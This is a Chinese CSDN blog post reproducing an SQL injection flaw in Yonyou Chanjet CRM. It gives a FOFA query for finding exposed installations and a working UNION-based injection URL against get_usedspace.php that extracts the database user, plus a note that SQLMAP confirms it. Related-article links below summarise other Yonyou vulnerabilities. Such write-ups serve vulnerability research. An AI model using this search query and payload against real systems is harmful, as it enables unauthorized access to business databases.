【漏洞复现】用友畅捷CRM存在SQL注入漏洞

最新推荐文章于 2024-04-11 15:48:16 发布
最新推荐文章于 2024-04-11 15:48:16 发布
阅读量1k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 用友畅捷CRM
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46944519/article/details/130519930
版权

文章目录

前言

用友畅捷CRM存在SQL注入漏洞,攻击者可通过使用工具获取数据库相关敏感信息,拿到服务器控制权限。

声明

本篇文章仅用于漏洞复现与技术研究,请勿利用文章内的相关技术从事非法测试,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

一、畅姐CRM简介

用友畅捷通T-CRM是用友公司全力打造的一款基于B/S架构、拥有强大自定义功能、多部门协作(市场、销售和服务)、基于客户全生命周期管理的客户关系管理软件。客户通主要面向成长型中小企业,以客户为中心,以客户营销为目的,帮助他们 " 提升营销能力,网罗天下商机"。

二、漏洞描述

畅捷CRM系统 存在SQL注入漏洞 ,攻击者可以利用该漏洞获取网站后台数据库敏感信息,甚至接管服务器权限,构成严重风险。

三、漏洞复现

FOFA:title=“畅捷CRM”

漏洞链接:http://x.x.x.x:port/webservice/get_usedspace.php?site_id=-999%20UNION%20ALL%20SELECT%20CONCAT(0x7e,0x7e,user(),0x7e,0x7e)--
在这里插入图片描述
使用SQLMAP验证
在这里插入图片描述

四、整改建议

请各单位关注厂商及时更新:http://www.realor.cn

李火火安全阁
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CRM SQL注入漏洞
0xSec
06-13 1577
用友CRMcreate_site.php处存在SQL时间盲注,攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限。
用友CRM存在默认空口令漏洞
nnn2188185的博客
04-23 423
用友CRM存在默认空口令漏洞,攻击者可以利用默认口令登录网站后台,以后台权限进行敏感操作,构成信息泄露风险。
通T-Plus SQL注入漏洞_68
fushuang333的博客
04-08 567
通T-Plus SQL注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
CRM 存在SQL注入+后台文件上传漏洞
qq_58091216的博客
12-07 1121
CRM是面向小企业全力打造的简单、实用的客户关系管理应用!CRM帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为。CRM系统存在SQL注入和后台文件上传漏洞,攻击者可以通过上传木马执行任意命令,获取服务器管理权限。
漏洞用友CRM get_usedspace存在SQL注入漏洞
最新发布
qq_34780861的博客
04-11 216
CRM系统get_usedspace存在SQL注入漏洞 ,攻击者可以利用该漏洞获取网站后台数据库敏感信息,甚至接管服务器权限,构成严重风险。
通T+ SQL注入漏洞(QVD-2023-13612)
0xSec
06-14 3635
通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实远程命令执行。
通T+SQL注入漏洞
holyxp的博客
07-27 804
通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。通T+的某后台功能点只校验了权限,未对用户的输入进行过滤,导致在权限绕过后存在SQL注入漏洞,利用此漏洞攻击者最终可以实远程命令执行。
漏洞用友通T+ SQL注入漏洞
2301_79099363的博客
07-13 1320
漏洞用友通T+ SQL注入漏洞
【1day】用友CRM create_site.phpSQL注入漏洞
记录并分享学习安全的知识点..
08-08 305
用友CRM是专为小企业量身打造的智慧型客户关系管理应用,它包括客户、商机、报价、团队管理、客户营销、客户服务、主题查询及统计分析,帮助企业管好客户、管好业务员、做好销售业务;系统还提供通知、审批、短信、文档、任务等协作功能,提高销售团队的协作效率,其中 create_site.php接口存在时间盲注漏洞
0day!用友CRM存在日志信息泄露漏洞-未公开漏洞
weixin_43167326的博客
02-27 535
CRM首先是一种管理理念,核心是将企业的客户作为企业最重要的资源,通过完善的客户服务和深入的客户分析来满足客户的需求,在向客户不断提供最大价值的同时,实企业的价值,实“双赢”。
CRM亮点及操作说明.pptx
09-23
CRM亮点及操作说明.pptx
CRM115产品介绍--XXXX07.pptx
09-23
CRM115产品介绍--XXXX07.pptx
CRM115产品白皮书(功能及技术介绍)-.docx
02-16
CRM115产品白皮书(功能及技术介绍)-.docx
用友U8CRM reservationcomplete.php 逻辑漏洞
03-21 251
用友U8+CRM是一款专为企业提供客户关系管理解决方案的软件。它通过整合多种网络化、低成本营销手段和沟通方式,帮助企业建立与客户之间通的交流平台。
用友GRP-U8 U8AppProxy任意文件上传漏洞+利用
0xSec
03-21 5246
用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
实战 - CRM 后台附件任意文件上传漏洞
HAKUNAMATATATTA的博客
04-25 309
CRM 后台附件存在任意文件上传漏洞,通过解析漏洞可跳过后缀更改获取网站权限。
用友 GRP-U8 Proxy XXE-SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
10-09 3392
用友GRP-U8 Proxy 存在SQL注入漏洞,攻击者可通过该漏洞获取服务器权限,详情点击了解更多。
crm v11.5安装包
10-30
CRM V11.5是一款用于企业客户关系管理的软件,它提供了销售、市场营销、客户服务等功能,帮助企业提升销售业绩和客户满意度。要安装CRM V11.5,首先需要下载安装包。安装包通常可以从CRM官方网站或授权的软件下载网站上获取。 下载安装包后,双击运行安装程序。安装程序会引导用户完成安装过程。在安装过程中,用户需要选择安装目录,一般建议选择系统盘下的Program Files文件夹。接下来,用户需要阅读并同意软件的许可协议,在安装过程中会提供相应选项。 安装过程需要一定时间,请耐心等待。安装完成后,用户可以在开始菜单中找到CRM V11.5的快方式。点击快方式,即可打开软件。 在使用CRM V11.5之前,用户还需要进行一些配置和设置。首先,用户需要输入许可证号进行激活。其次,用户需要设置数据库连接信息,包括数据库名称、用户名和密码等。此外,还可以进行其他一些个性化设置,如选择显示语言、修改主题等。 安装完成并进行相关配置后,用户就可以开始使用CRM V11.5了。登录软件后,可以根据需要使用不同的功能模块,如销售管理、市场营销、客户服务等。用户可以根据实际需求进行数据录入、报表生成、任务分配等操作。 总的来说,CRM V11.5的安装过程相对简单,但用户需要注意选择合适的安装路径并进行相关配置和设置。安装完成后,用户就可以充分利用CRM V11.5提供的功能,提升企业的销售和客户管理效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李火火安全阁

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值